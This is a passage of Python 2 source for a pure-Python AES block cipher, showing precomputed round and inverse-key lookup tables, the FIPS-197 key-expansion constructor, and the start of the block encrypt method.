0xba0ae293, 0x2ae5c0a0, 0xe0433c22, 0x171d121b, 0x0d0b0e09, 0xc7adf28b, 0xa8b92db6, 0xa9c8141e, 0x198557f1, 0x074caf75, 0xddbbee99, 0x60fda37f, 0x269ff701, 0xf5bc5c72, 0x3bc54466, 0x7e345bfb, 0x29768b43, 0xc6dccb23, 0xfc68b6ed, 0xf163b8e4, 0xdccad731, 0x85104263, 0x22401397, 0x112084c6, 0x247d854a, 0x3df8d2bb, 0x3211aef9, 0xa16dc729, 0x2f4b1d9e, 0x30f3dcb2, 0x52ec0d86, 0xe3d077c1, 0x166c2bb3, 0xb999a970, 0x48fa1194, 0x642247e9, 0x8cc4a8fc, 0x3f1aa0f0, 0x2cd8567d, 0x90ef2233, 0x4ec78749, 0xd1c1d938, 0xa2fe8cca, 0x0b3698d4, 0x81cfa6f5, 0xde28a57a, 0x8e26dab7, 0xbfa43fad, 0x9de42c3a, 0x920d5078, 0xcc9b6a5f, 0x4662547e, 0x13c2f68d, 0xb8e890d8, 0xf75e2e39, 0xaff582c3, 0x80be9f5d, 0x937c69d0, 0x2da96fd5, 0x12b3cf25, 0x993bc8ac, 0x7da71018, 0x636ee89c, 0xbb7bdb3b, 0x7809cd26, 0x18f46e59, 0xb701ec9a, 0x9aa8834f, 0x6e65e695, 0xe67eaaff, 0xcf0821bc, 0xe8e6ef15, 0x9bd9bae7, 0x36ce4a6f, 0x09d4ea9f, 0x7cd629b0, 0xb2af31a4, 0x23312a3f, 0x9430c6a5, 0x66c035a2, 0xbc37744e, 0xcaa6fc82, 0xd0b0e090, 0xd81533a7, 0x984af104, 0xdaf741ec, 0x500e7fcd, 0xf62f1791, 0xd68d764d, 0xb04d43ef, 0x4d54ccaa, 0x04dfe496, 0xb5e39ed1, 0x881b4c6a, 0x1fb8c12c, 0x517f4665, 0xea049d5e, 0x355d018c, 0x7473fa87, 0x412efb0b, 0x1d5ab367, 0xd25292db, 0x5633e910, 0x47136dd6, 0x618c9ad7, 0x0c7a37a1, 0x148e59f8, 0x3c89eb13, 0x27eecea9, 0xc935b761, 0xe5ede11c, 0xb13c7a47, 0xdf599cd2, 0x733f55f2, 0xce791814, 0x37bf73c7, 0xcdea53f7, 0xaa5b5ffd, 0x6f14df3d, 0xdb867844, 0xf381caaf, 0xc43eb968, 0x342c3824, 0x405fc2a3, 0xc372161d, 0x250cbce2, 0x498b283c, 0x9541ff0d, 0x017139a8, 0xb3de080c, 0xe49cd8b4, 0xc1906456, 0x84617bcb, 0xb670d532, 0x5c74486c, 0x5742d0b8]
T8 = [0xf4a75051, 0x4165537e, 0x17a4c31a, 0x275e963a, 0xab6bcb3b, 0x9d45f11f, 0xfa58abac, 0xe303934b, 0x30fa5520, 0x766df6ad, 0xcc769188, 0x024c25f5, 0xe5d7fc4f, 0x2acbd7c5, 0x35448026, 0x62a38fb5, 0xb15a49de, 0xba1b6725, 0xea0e9845, 0xfec0e15d, 0x2f7502c3, 0x4cf01281, 0x4697a38d, 0xd3f9c66b, 0x8f5fe703, 0x929c9515, 0x6d7aebbf, 0x5259da95, 0xbe832dd4, 0x7421d358, 0xe0692949, 0xc9c8448e, 0xc2896a75, 0x8e7978f4, 0x583e6b99, 0xb971dd27, 0xe14fb6be, 0x88ad17f0, 0x20ac66c9, 0xce3ab47d, 0xdf4a1863, 0x1a3182e5, 0x51336097, 0x537f4562, 0x6477e0b1, 0x6bae84bb, 0x81a01cfe, 0x082b94f9, 0x48685870, 0x45fd198f, 0xde6c8794, 0x7bf8b752, 0x73d323ab, 0x4b02e272, 0x1f8f57e3, 0x55ab2a66, 0xeb2807b2, 0xb5c2032f, 0xc57b9a86, 0x3708a5d3, 0x2887f230, 0xbfa5b223, 0x036aba02, 0x16825ced, 0xcf1c2b8a, 0x79b492a7, 0x07f2f0f3, 0x69e2a14e, 0xdaf4cd65, 0x05bed506, 0x34621fd1, 0xa6fe8ac4, 0x2e539d34, 0xf355a0a2, 0x8ae13205, 0xf6eb75a4, 0x83ec390b, 0x60efaa40, 0x719f065e, 0x6e1051bd, 0x218af93e, 0xdd063d96, 0x3e05aedd, 0xe6bd464d, 0x548db591, 0xc45d0571, 0x06d46f04, 0x5015ff60, 0x98fb2419, 0xbde997d6, 0x4043cc89, 0xd99e7767, 0xe842bdb0, 0x898b8807, 0x195b38e7, 0xc8eedb79, 0x7c0a47a1, 0x420fe97c, 0x841ec9f8, 0x00000000, 0x80868309, 0x2bed4832, 0x1170ac1e, 0x5a724e6c, 0x0efffbfd, 0x8538560f, 0xaed51e3d, 0x2d392736, 0x0fd9640a, 0x5ca62168, 0x5b54d19b, 0x362e3a24, 0x0a67b10c, 0x57e70f93, 0xee96d2b4, 0x9b919e1b, 0xc0c54f80, 0xdc20a261, 0x774b695a, 0x121a161c, 0x93ba0ae2, 0xa02ae5c0, 0x22e0433c, 0x1b171d12, 0x090d0b0e, 0x8bc7adf2, 0xb6a8b92d, 0x1ea9c814, 0xf1198557, 0x75074caf, 0x99ddbbee, 0x7f60fda3, 0x01269ff7, 0x72f5bc5c, 0x663bc544, 0xfb7e345b, 0x4329768b, 0x23c6dccb, 0xedfc68b6, 0xe4f163b8, 0x31dccad7, 0x63851042, 0x97224013, 0xc6112084, 0x4a247d85, 0xbb3df8d2, 0xf93211ae, 0x29a16dc7, 0x9e2f4b1d, 0xb230f3dc, 0x8652ec0d, 0xc1e3d077, 0xb3166c2b, 0x70b999a9, 0x9448fa11, 0xe9642247, 0xfc8cc4a8, 0xf03f1aa0, 0x7d2cd856, 0x3390ef22, 0x494ec787, 0x38d1c1d9, 0xcaa2fe8c, 0xd40b3698, 0xf581cfa6, 0x7ade28a5, 0xb78e26da, 0xadbfa43f, 0x3a9de42c, 0x78920d50, 0x5fcc9b6a, 0x7e466254, 0x8d13c2f6, 0xd8b8e890, 0x39f75e2e, 0xc3aff582, 0x5d80be9f, 0xd0937c69, 0xd52da96f, 0x2512b3cf, 0xac993bc8, 0x187da710, 0x9c636ee8, 0x3bbb7bdb, 0x267809cd, 0x5918f46e, 0x9ab701ec, 0x4f9aa883, 0x956e65e6, 0xffe67eaa, 0xbccf0821, 0x15e8e6ef, 0xe79bd9ba, 0x6f36ce4a, 0x9f09d4ea, 0xb07cd629, 0xa4b2af31, 0x3f23312a, 0xa59430c6, 0xa266c035, 0x4ebc3774, 0x82caa6fc, 0x90d0b0e0, 0xa7d81533, 0x04984af1, 0xecdaf741, 0xcd500e7f, 0x91f62f17, 0x4dd68d76, 0xefb04d43, 0xaa4d54cc, 0x9604dfe4, 0xd1b5e39e, 0x6a881b4c, 0x2c1fb8c1, 0x65517f46, 0x5eea049d, 0x8c355d01, 0x877473fa, 0x0b412efb, 0x671d5ab3, 0xdbd25292, 0x105633e9, 0xd647136d, 0xd7618c9a, 0xa10c7a37, 0xf8148e59, 0x133c89eb, 0xa927eece, 0x61c935b7, 0x1ce5ede1, 0x47b13c7a, 0xd2df599c, 0xf2733f55, 0x14ce7918, 0xc737bf73, 0xf7cdea53, 0xfdaa5b5f, 0x3d6f14df, 0x44db8678, 0xaff381ca, 0x68c43eb9, 0x24342c38, 0xa3405fc2, 0x1dc37216, 0xe2250cbc, 0x3c498b28, 0x0d9541ff, 0xa8017139, 0x0cb3de08, 0xb4e49cd8, 0x56c19064, 0xcb84617b, 0x32b670d5, 0x6c5c7448, 0xb85742d0]
# Transformations for decryption key expansion
U1 = [0x00000000, 0x0e090d0b, 0x1c121a16, 0x121b171d, 0x3824342c, 0x362d3927, 0x24362e3a, 0x2a3f2331, 0x70486858, 0x7e416553, 0x6c5a724e, 0x62537f45, 0x486c5c74, 0x4665517f, 0x547e4662, 0x5a774b69, 0xe090d0b0, 0xee99ddbb, 0xfc82caa6, 0xf28bc7ad, 0xd8b4e49c, 0xd6bde997, 0xc4a6fe8a, 0xcaaff381, 0x90d8b8e8, 0x9ed1b5e3, 0x8ccaa2fe, 0x82c3aff5, 0xa8fc8cc4, 0xa6f581cf, 0xb4ee96d2, 0xbae79bd9, 0xdb3bbb7b, 0xd532b670, 0xc729a16d, 0xc920ac66, 0xe31f8f57, 0xed16825c, 0xff0d9541, 0xf104984a, 0xab73d323, 0xa57ade28, 0xb761c935, 0xb968c43e, 0x9357e70f, 0x9d5eea04, 0x8f45fd19, 0x814cf012, 0x3bab6bcb, 0x35a266c0, 0x27b971dd, 0x29b07cd6, 0x038f5fe7, 0x0d8652ec, 0x1f9d45f1, 0x119448fa, 0x4be30393, 0x45ea0e98, 0x57f11985, 0x59f8148e, 0x73c737bf, 0x7dce3ab4, 0x6fd52da9, 0x61dc20a2, 0xad766df6, 0xa37f60fd, 0xb16477e0, 0xbf6d7aeb, 0x955259da, 0x9b5b54d1, 0x894043cc, 0x87494ec7, 0xdd3e05ae, 0xd33708a5, 0xc12c1fb8, 0xcf2512b3, 0xe51a3182, 0xeb133c89, 0xf9082b94, 0xf701269f, 0x4de6bd46, 0x43efb04d, 0x51f4a750, 0x5ffdaa5b, 0x75c2896a, 0x7bcb8461, 0x69d0937c, 0x67d99e77, 0x3daed51e, 0x33a7d815, 0x21bccf08, 0x2fb5c203, 0x058ae132, 0x0b83ec39, 0x1998fb24, 0x1791f62f, 0x764dd68d, 0x7844db86, 0x6a5fcc9b, 0x6456c190, 0x4e69e2a1, 0x4060efaa, 0x527bf8b7, 0x5c72f5bc, 0x0605bed5, 0x080cb3de, 0x1a17a4c3, 0x141ea9c8, 0x3e218af9, 0x302887f2, 0x223390ef, 0x2c3a9de4, 0x96dd063d, 0x98d40b36, 0x8acf1c2b, 0x84c61120, 0xaef93211, 0xa0f03f1a, 0xb2eb2807, 0xbce2250c, 0xe6956e65, 0xe89c636e, 0xfa877473, 0xf48e7978, 0xdeb15a49, 0xd0b85742, 0xc2a3405f, 0xccaa4d54, 0x41ecdaf7, 0x4fe5d7fc, 0x5dfec0e1, 0x53f7cdea, 0x79c8eedb, 0x77c1e3d0, 0x65daf4cd, 0x6bd3f9c6, 0x31a4b2af, 0x3fadbfa4, 0x2db6a8b9, 0x23bfa5b2, 0x09808683, 0x07898b88, 0x15929c95, 0x1b9b919e, 0xa17c0a47, 0xaf75074c, 0xbd6e1051, 0xb3671d5a, 0x99583e6b, 0x97513360, 0x854a247d, 0x8b432976, 0xd134621f, 0xdf3d6f14, 0xcd267809, 0xc32f7502, 0xe9105633, 0xe7195b38, 0xf5024c25, 0xfb0b412e, 0x9ad7618c, 0x94de6c87, 0x86c57b9a, 0x88cc7691, 0xa2f355a0, 0xacfa58ab, 0xbee14fb6, 0xb0e842bd, 0xea9f09d4, 0xe49604df, 0xf68d13c2, 0xf8841ec9, 0xd2bb3df8, 0xdcb230f3, 0xcea927ee, 0xc0a02ae5, 0x7a47b13c, 0x744ebc37, 0x6655ab2a, 0x685ca621, 0x42638510, 0x4c6a881b, 0x5e719f06, 0x5078920d, 0x0a0fd964, 0x0406d46f, 0x161dc372, 0x1814ce79, 0x322bed48, 0x3c22e043, 0x2e39f75e, 0x2030fa55, 0xec9ab701, 0xe293ba0a, 0xf088ad17, 0xfe81a01c, 0xd4be832d, 0xdab78e26, 0xc8ac993b, 0xc6a59430, 0x9cd2df59, 0x92dbd252, 0x80c0c54f, 0x8ec9c844, 0xa4f6eb75, 0xaaffe67e, 0xb8e4f163, 0xb6edfc68, 0x0c0a67b1, 0x02036aba, 0x10187da7, 0x1e1170ac, 0x342e539d, 0x3a275e96, 0x283c498b, 0x26354480, 0x7c420fe9, 0x724b02e2, 0x605015ff, 0x6e5918f4, 0x44663bc5, 0x4a6f36ce, 0x587421d3, 0x567d2cd8, 0x37a10c7a, 0x39a80171, 0x2bb3166c, 0x25ba1b67, 0x0f853856, 0x018c355d, 0x13972240, 0x1d9e2f4b, 0x47e96422, 0x49e06929, 0x5bfb7e34, 0x55f2733f, 0x7fcd500e, 0x71c45d05, 0x63df4a18, 0x6dd64713, 0xd731dcca, 0xd938d1c1, 0xcb23c6dc, 0xc52acbd7, 0xef15e8e6, 0xe11ce5ed, 0xf307f2f0, 0xfd0efffb, 0xa779b492, 0xa970b999, 0xbb6bae84, 0xb562a38f, 0x9f5d80be, 0x91548db5, 0x834f9aa8, 0x8d4697a3]
U2 = [0x00000000, 0x0b0e090d, 0x161c121a, 0x1d121b17, 0x2c382434, 0x27362d39, 0x3a24362e, 0x312a3f23, 0x58704868, 0x537e4165, 0x4e6c5a72, 0x4562537f, 0x74486c5c, 0x7f466551, 0x62547e46, 0x695a774b, 0xb0e090d0, 0xbbee99dd, 0xa6fc82ca, 0xadf28bc7, 0x9cd8b4e4, 0x97d6bde9, 0x8ac4a6fe, 0x81caaff3, 0xe890d8b8, 0xe39ed1b5, 0xfe8ccaa2, 0xf582c3af, 0xc4a8fc8c, 0xcfa6f581, 0xd2b4ee96, 0xd9bae79b, 0x7bdb3bbb, 0x70d532b6, 0x6dc729a1, 0x66c920ac, 0x57e31f8f, 0x5ced1682, 0x41ff0d95, 0x4af10498, 0x23ab73d3, 0x28a57ade, 0x35b761c9, 0x3eb968c4, 0x0f9357e7, 0x049d5eea, 0x198f45fd, 0x12814cf0, 0xcb3bab6b, 0xc035a266, 0xdd27b971, 0xd629b07c, 0xe7038f5f, 0xec0d8652, 0xf11f9d45, 0xfa119448, 0x934be303, 0x9845ea0e, 0x8557f119, 0x8e59f814, 0xbf73c737, 0xb47dce3a, 0xa96fd52d, 0xa261dc20, 0xf6ad766d, 0xfda37f60, 0xe0b16477, 0xebbf6d7a, 0xda955259, 0xd19b5b54, 0xcc894043, 0xc787494e, 0xaedd3e05, 0xa5d33708, 0xb8c12c1f, 0xb3cf2512, 0x82e51a31, 0x89eb133c, 0x94f9082b, 0x9ff70126, 0x464de6bd, 0x4d43efb0, 0x5051f4a7, 0x5b5ffdaa, 0x6a75c289, 0x617bcb84, 0x7c69d093, 0x7767d99e, 0x1e3daed5, 0x1533a7d8, 0x0821bccf, 0x032fb5c2, 0x32058ae1, 0x390b83ec, 0x241998fb, 0x2f1791f6, 0x8d764dd6, 0x867844db, 0x9b6a5fcc, 0x906456c1, 0xa14e69e2, 0xaa4060ef, 0xb7527bf8, 0xbc5c72f5, 0xd50605be, 0xde080cb3, 0xc31a17a4, 0xc8141ea9, 0xf93e218a, 0xf2302887, 0xef223390, 0xe42c3a9d, 0x3d96dd06, 0x3698d40b, 0x2b8acf1c, 0x2084c611, 0x11aef932, 0x1aa0f03f, 0x07b2eb28, 0x0cbce225, 0x65e6956e, 0x6ee89c63, 0x73fa8774, 0x78f48e79, 0x49deb15a, 0x42d0b857, 0x5fc2a340, 0x54ccaa4d, 0xf741ecda, 0xfc4fe5d7, 0xe15dfec0, 0xea53f7cd, 0xdb79c8ee, 0xd077c1e3, 0xcd65daf4, 0xc66bd3f9, 0xaf31a4b2, 0xa43fadbf, 0xb92db6a8, 0xb223bfa5, 0x83098086, 0x8807898b, 0x9515929c, 0x9e1b9b91, 0x47a17c0a, 0x4caf7507, 0x51bd6e10, 0x5ab3671d, 0x6b99583e, 0x60975133, 0x7d854a24, 0x768b4329, 0x1fd13462, 0x14df3d6f, 0x09cd2678, 0x02c32f75, 0x33e91056, 0x38e7195b, 0x25f5024c, 0x2efb0b41, 0x8c9ad761, 0x8794de6c, 0x9a86c57b, 0x9188cc76, 0xa0a2f355, 0xabacfa58, 0xb6bee14f, 0xbdb0e842, 0xd4ea9f09, 0xdfe49604, 0xc2f68d13, 0xc9f8841e, 0xf8d2bb3d, 0xf3dcb230, 0xeecea927, 0xe5c0a02a, 0x3c7a47b1, 0x37744ebc, 0x2a6655ab, 0x21685ca6, 0x10426385, 0x1b4c6a88, 0x065e719f, 0x0d507892, 0x640a0fd9, 0x6f0406d4, 0x72161dc3, 0x791814ce, 0x48322bed, 0x433c22e0, 0x5e2e39f7, 0x552030fa, 0x01ec9ab7, 0x0ae293ba, 0x17f088ad, 0x1cfe81a0, 0x2dd4be83, 0x26dab78e, 0x3bc8ac99, 0x30c6a594, 0x599cd2df, 0x5292dbd2, 0x4f80c0c5, 0x448ec9c8, 0x75a4f6eb, 0x7eaaffe6, 0x63b8e4f1, 0x68b6edfc, 0xb10c0a67, 0xba02036a, 0xa710187d, 0xac1e1170, 0x9d342e53, 0x963a275e, 0x8b283c49, 0x80263544, 0xe97c420f, 0xe2724b02, 0xff605015, 0xf46e5918, 0xc544663b, 0xce4a6f36, 0xd3587421, 0xd8567d2c, 0x7a37a10c, 0x7139a801, 0x6c2bb316, 0x6725ba1b, 0x560f8538, 0x5d018c35, 0x40139722, 0x4b1d9e2f, 0x2247e964, 0x2949e069, 0x345bfb7e, 0x3f55f273, 0x0e7fcd50, 0x0571c45d, 0x1863df4a, 0x136dd647, 0xcad731dc, 0xc1d938d1, 0xdccb23c6, 0xd7c52acb, 0xe6ef15e8, 0xede11ce5, 0xf0f307f2, 0xfbfd0eff, 0x92a779b4, 0x99a970b9, 0x84bb6bae, 0x8fb562a3, 0xbe9f5d80, 0xb591548d, 0xa8834f9a, 0xa38d4697]
U3 = [0x00000000, 0x0d0b0e09, 0x1a161c12, 0x171d121b, 0x342c3824, 0x3927362d, 0x2e3a2436, 0x23312a3f, 0x68587048, 0x65537e41, 0x724e6c5a, 0x7f456253, 0x5c74486c, 0x517f4665, 0x4662547e, 0x4b695a77, 0xd0b0e090, 0xddbbee99, 0xcaa6fc82, 0xc7adf28b, 0xe49cd8b4, 0xe997d6bd, 0xfe8ac4a6, 0xf381caaf, 0xb8e890d8, 0xb5e39ed1, 0xa2fe8cca, 0xaff582c3, 0x8cc4a8fc, 0x81cfa6f5, 0x96d2b4ee, 0x9bd9bae7, 0xbb7bdb3b, 0xb670d532, 0xa16dc729, 0xac66c920, 0x8f57e31f, 0x825ced16, 0x9541ff0d, 0x984af104, 0xd323ab73, 0xde28a57a, 0xc935b761, 0xc43eb968, 0xe70f9357, 0xea049d5e, 0xfd198f45, 0xf012814c, 0x6bcb3bab, 0x66c035a2, 0x71dd27b9, 0x7cd629b0, 0x5fe7038f, 0x52ec0d86, 0x45f11f9d, 0x48fa1194, 0x03934be3, 0x0e9845ea, 0x198557f1, 0x148e59f8, 0x37bf73c7, 0x3ab47dce, 0x2da96fd5, 0x20a261dc, 0x6df6ad76, 0x60fda37f, 0x77e0b164, 0x7aebbf6d, 0x59da9552, 0x54d19b5b, 0x43cc8940, 0x4ec78749, 0x05aedd3e, 0x08a5d337, 0x1fb8c12c, 0x12b3cf25, 0x3182e51a, 0x3c89eb13, 0x2b94f908, 0x269ff701, 0xbd464de6, 0xb04d43ef, 0xa75051f4, 0xaa5b5ffd, 0x896a75c2, 0x84617bcb, 0x937c69d0, 0x9e7767d9, 0xd51e3dae, 0xd81533a7, 0xcf0821bc, 0xc2032fb5, 0xe132058a, 0xec390b83, 0xfb241998, 0xf62f1791, 0xd68d764d, 0xdb867844, 0xcc9b6a5f, 0xc1906456, 0xe2a14e69, 0xefaa4060, 0xf8b7527b, 0xf5bc5c72, 0xbed50605, 0xb3de080c, 0xa4c31a17, 0xa9c8141e, 0x8af93e21, 0x87f23028, 0x90ef2233, 0x9de42c3a, 0x063d96dd, 0x0b3698d4, 0x1c2b8acf, 0x112084c6, 0x3211aef9, 0x3f1aa0f0, 0x2807b2eb, 0x250cbce2, 0x6e65e695, 0x636ee89c, 0x7473fa87, 0x7978f48e, 0x5a49deb1, 0x5742d0b8, 0x405fc2a3, 0x4d54ccaa, 0xdaf741ec, 0xd7fc4fe5, 0xc0e15dfe, 0xcdea53f7, 0xeedb79c8, 0xe3d077c1, 0xf4cd65da, 0xf9c66bd3, 0xb2af31a4, 0xbfa43fad, 0xa8b92db6, 0xa5b223bf, 0x86830980, 0x8b880789, 0x9c951592, 0x919e1b9b, 0x0a47a17c, 0x074caf75, 0x1051bd6e, 0x1d5ab367, 0x3e6b9958, 0x33609751, 0x247d854a, 0x29768b43, 0x621fd134, 0x6f14df3d, 0x7809cd26, 0x7502c32f, 0x5633e910, 0x5b38e719, 0x4c25f502, 0x412efb0b, 0x618c9ad7, 0x6c8794de, 0x7b9a86c5, 0x769188cc, 0x55a0a2f3, 0x58abacfa, 0x4fb6bee1, 0x42bdb0e8, 0x09d4ea9f, 0x04dfe496, 0x13c2f68d, 0x1ec9f884, 0x3df8d2bb, 0x30f3dcb2, 0x27eecea9, 0x2ae5c0a0, 0xb13c7a47, 0xbc37744e, 0xab2a6655, 0xa621685c, 0x85104263, 0x881b4c6a, 0x9f065e71, 0x920d5078, 0xd9640a0f, 0xd46f0406, 0xc372161d, 0xce791814, 0xed48322b, 0xe0433c22, 0xf75e2e39, 0xfa552030, 0xb701ec9a, 0xba0ae293, 0xad17f088, 0xa01cfe81, 0x832dd4be, 0x8e26dab7, 0x993bc8ac, 0x9430c6a5, 0xdf599cd2, 0xd25292db, 0xc54f80c0, 0xc8448ec9, 0xeb75a4f6, 0xe67eaaff, 0xf163b8e4, 0xfc68b6ed, 0x67b10c0a, 0x6aba0203, 0x7da71018, 0x70ac1e11, 0x539d342e, 0x5e963a27, 0x498b283c, 0x44802635, 0x0fe97c42, 0x02e2724b, 0x15ff6050, 0x18f46e59, 0x3bc54466, 0x36ce4a6f, 0x21d35874, 0x2cd8567d, 0x0c7a37a1, 0x017139a8, 0x166c2bb3, 0x1b6725ba, 0x38560f85, 0x355d018c, 0x22401397, 0x2f4b1d9e, 0x642247e9, 0x692949e0, 0x7e345bfb, 0x733f55f2, 0x500e7fcd, 0x5d0571c4, 0x4a1863df, 0x47136dd6, 0xdccad731, 0xd1c1d938, 0xc6dccb23, 0xcbd7c52a, 0xe8e6ef15, 0xe5ede11c, 0xf2f0f307, 0xfffbfd0e, 0xb492a779, 0xb999a970, 0xae84bb6b, 0xa38fb562, 0x80be9f5d, 0x8db59154, 0x9aa8834f, 0x97a38d46]
U4 = [0x00000000, 0x090d0b0e, 0x121a161c, 0x1b171d12, 0x24342c38, 0x2d392736, 0x362e3a24, 0x3f23312a, 0x48685870, 0x4165537e, 0x5a724e6c, 0x537f4562, 0x6c5c7448, 0x65517f46, 0x7e466254, 0x774b695a, 0x90d0b0e0, 0x99ddbbee, 0x82caa6fc, 0x8bc7adf2, 0xb4e49cd8, 0xbde997d6, 0xa6fe8ac4, 0xaff381ca, 0xd8b8e890, 0xd1b5e39e, 0xcaa2fe8c, 0xc3aff582, 0xfc8cc4a8, 0xf581cfa6, 0xee96d2b4, 0xe79bd9ba, 0x3bbb7bdb, 0x32b670d5, 0x29a16dc7, 0x20ac66c9, 0x1f8f57e3, 0x16825ced, 0x0d9541ff, 0x04984af1, 0x73d323ab, 0x7ade28a5, 0x61c935b7, 0x68c43eb9, 0x57e70f93, 0x5eea049d, 0x45fd198f, 0x4cf01281, 0xab6bcb3b, 0xa266c035, 0xb971dd27, 0xb07cd629, 0x8f5fe703, 0x8652ec0d, 0x9d45f11f, 0x9448fa11, 0xe303934b, 0xea0e9845, 0xf1198557, 0xf8148e59, 0xc737bf73, 0xce3ab47d, 0xd52da96f, 0xdc20a261, 0x766df6ad, 0x7f60fda3, 0x6477e0b1, 0x6d7aebbf, 0x5259da95, 0x5b54d19b, 0x4043cc89, 0x494ec787, 0x3e05aedd, 0x3708a5d3, 0x2c1fb8c1, 0x2512b3cf, 0x1a3182e5, 0x133c89eb, 0x082b94f9, 0x01269ff7, 0xe6bd464d, 0xefb04d43, 0xf4a75051, 0xfdaa5b5f, 0xc2896a75, 0xcb84617b, 0xd0937c69, 0xd99e7767, 0xaed51e3d, 0xa7d81533, 0xbccf0821, 0xb5c2032f, 0x8ae13205, 0x83ec390b, 0x98fb2419, 0x91f62f17, 0x4dd68d76, 0x44db8678, 0x5fcc9b6a, 0x56c19064, 0x69e2a14e, 0x60efaa40, 0x7bf8b752, 0x72f5bc5c, 0x05bed506, 0x0cb3de08, 0x17a4c31a, 0x1ea9c814, 0x218af93e, 0x2887f230, 0x3390ef22, 0x3a9de42c, 0xdd063d96, 0xd40b3698, 0xcf1c2b8a, 0xc6112084, 0xf93211ae, 0xf03f1aa0, 0xeb2807b2, 0xe2250cbc, 0x956e65e6, 0x9c636ee8, 0x877473fa, 0x8e7978f4, 0xb15a49de, 0xb85742d0, 0xa3405fc2, 0xaa4d54cc, 0xecdaf741, 0xe5d7fc4f, 0xfec0e15d, 0xf7cdea53, 0xc8eedb79, 0xc1e3d077, 0xdaf4cd65, 0xd3f9c66b, 0xa4b2af31, 0xadbfa43f, 0xb6a8b92d, 0xbfa5b223, 0x80868309, 0x898b8807, 0x929c9515, 0x9b919e1b, 0x7c0a47a1, 0x75074caf, 0x6e1051bd, 0x671d5ab3, 0x583e6b99, 0x51336097, 0x4a247d85, 0x4329768b, 0x34621fd1, 0x3d6f14df, 0x267809cd, 0x2f7502c3, 0x105633e9, 0x195b38e7, 0x024c25f5, 0x0b412efb, 0xd7618c9a, 0xde6c8794, 0xc57b9a86, 0xcc769188, 0xf355a0a2, 0xfa58abac, 0xe14fb6be, 0xe842bdb0, 0x9f09d4ea, 0x9604dfe4, 0x8d13c2f6, 0x841ec9f8, 0xbb3df8d2, 0xb230f3dc, 0xa927eece, 0xa02ae5c0, 0x47b13c7a, 0x4ebc3774, 0x55ab2a66, 0x5ca62168, 0x63851042, 0x6a881b4c, 0x719f065e, 0x78920d50, 0x0fd9640a, 0x06d46f04, 0x1dc37216, 0x14ce7918, 0x2bed4832, 0x22e0433c, 0x39f75e2e, 0x30fa5520, 0x9ab701ec, 0x93ba0ae2, 0x88ad17f0, 0x81a01cfe, 0xbe832dd4, 0xb78e26da, 0xac993bc8, 0xa59430c6, 0xd2df599c, 0xdbd25292, 0xc0c54f80, 0xc9c8448e, 0xf6eb75a4, 0xffe67eaa, 0xe4f163b8, 0xedfc68b6, 0x0a67b10c, 0x036aba02, 0x187da710, 0x1170ac1e, 0x2e539d34, 0x275e963a, 0x3c498b28, 0x35448026, 0x420fe97c, 0x4b02e272, 0x5015ff60, 0x5918f46e, 0x663bc544, 0x6f36ce4a, 0x7421d358, 0x7d2cd856, 0xa10c7a37, 0xa8017139, 0xb3166c2b, 0xba1b6725, 0x8538560f, 0x8c355d01, 0x97224013, 0x9e2f4b1d, 0xe9642247, 0xe0692949, 0xfb7e345b, 0xf2733f55, 0xcd500e7f, 0xc45d0571, 0xdf4a1863, 0xd647136d, 0x31dccad7, 0x38d1c1d9, 0x23c6dccb, 0x2acbd7c5, 0x15e8e6ef, 0x1ce5ede1, 0x07f2f0f3, 0x0efffbfd, 0x79b492a7, 0x70b999a9, 0x6bae84bb, 0x62a38fb5, 0x5d80be9f, 0x548db591, 0x4f9aa883, 0x4697a38d]
def __init__(self, key):
if len(key) not in (16, 24, 32):
raise ValueError('Invalid key size')
rounds = self.number_of_rounds[len(key)]
# Encryption round keys
self._Ke = [[0] * 4 for i in xrange(rounds + 1)]
# Decryption round keys
self._Kd = [[0] * 4 for i in xrange(rounds + 1)]
round_key_count = (rounds + 1) * 4
KC = len(key) // 4
# Convert the key into ints
tk = [struct.unpack('>i', key[i:i + 4])[0] for i in xrange(0, len(key), 4)]
# Copy values into round key arrays
for i in xrange(0, KC):
self._Ke[i // 4][i % 4] = tk[i]
self._Kd[rounds - (i // 4)][i % 4] = tk[i]
# Key expansion (fips-197 section 5.2)
rconpointer = 0
t = KC
while t < round_key_count:
tt = tk[KC - 1]
tk[0] ^= ((self.S[(tt >> 16) & 0xFF] << 24) ^
(self.S[(tt >> 8) & 0xFF] << 16) ^
(self.S[ tt & 0xFF] << 8) ^
self.S[(tt >> 24) & 0xFF] ^
(self.rcon[rconpointer] << 24))
rconpointer += 1
if KC != 8:
for i in xrange(1, KC):
tk[i] ^= tk[i - 1]
# Key expansion for 256-bit keys is "slightly different" (fips-197)
else:
for i in xrange(1, KC // 2):
tk[i] ^= tk[i - 1]
tt = tk[KC // 2 - 1]
tk[KC // 2] ^= (self.S[ tt & 0xFF] ^
(self.S[(tt >> 8) & 0xFF] << 8) ^
(self.S[(tt >> 16) & 0xFF] << 16) ^
(self.S[(tt >> 24) & 0xFF] << 24))
for i in xrange(KC // 2 + 1, KC):
tk[i] ^= tk[i - 1]
# Copy values into round key arrays
j = 0
while j < KC and t < round_key_count:
self._Ke[t // 4][t % 4] = tk[j]
self._Kd[rounds - (t // 4)][t % 4] = tk[j]
j += 1
t += 1
# Inverse-Cipher-ify the decryption round key (fips-197 section 5.3)
for r in xrange(1, rounds):
for j in xrange(0, 4):
tt = self._Kd[r][j]
self._Kd[r][j] = (self.U1[(tt >> 24) & 0xFF] ^
self.U2[(tt >> 16) & 0xFF] ^
self.U3[(tt >> 8) & 0xFF] ^
self.U4[ tt & 0xFF])
def encrypt(self, plaintext):
'Encrypt a block of plain text using the AES block cipher.'
if len(plaintext) != 16:
raise ValueError('wrong block length')
rounds = len(self._Ke) - 1
(s1, s2, s3) = [1, 2, 3]
a = [0, 0, 0, 0]
# Convert plaintext to (ints ^ key)
t = [(_compact_word(plaintext[4 * i:4 * i + 4]) ^ self._Ke[0][i]) for i in xrange(0, 4)]
# Apply round transforms
for r in xrange(1, rounds):
for i in xrange(0, 4):
a[i] = (self.T1[(t[ i ] >> 24) & 0xFF] ^
self.T2[(t[(i + s1) % 4] >> 16) & 0xFF] ^
self.T3[(t[(i + s2) % 4] >> 8) & 0xFF] ^
self.T4[ t[(i + s3) % 4] & 0xFF] ^
self._Ke[r][i])
t = copy.copy(a)
# The last round is special
result = []
for i in xrange(0, 4):
tt = self._Ke[rounds][i]
result.append((self.S[(t[ i ] >> 24) & 0xFF] ^ (tt >> 24)) & 0xFF)
result.append((self.S[(t[(i + s1) % 4] >> 16) & 0xFF] ^ (tt >> 16)) & 0xFF)
result.append((self.S[(t[(i + s2) % 4] >> 8) & 0xFF] ^ (tt >> 8)) & 0xFF)
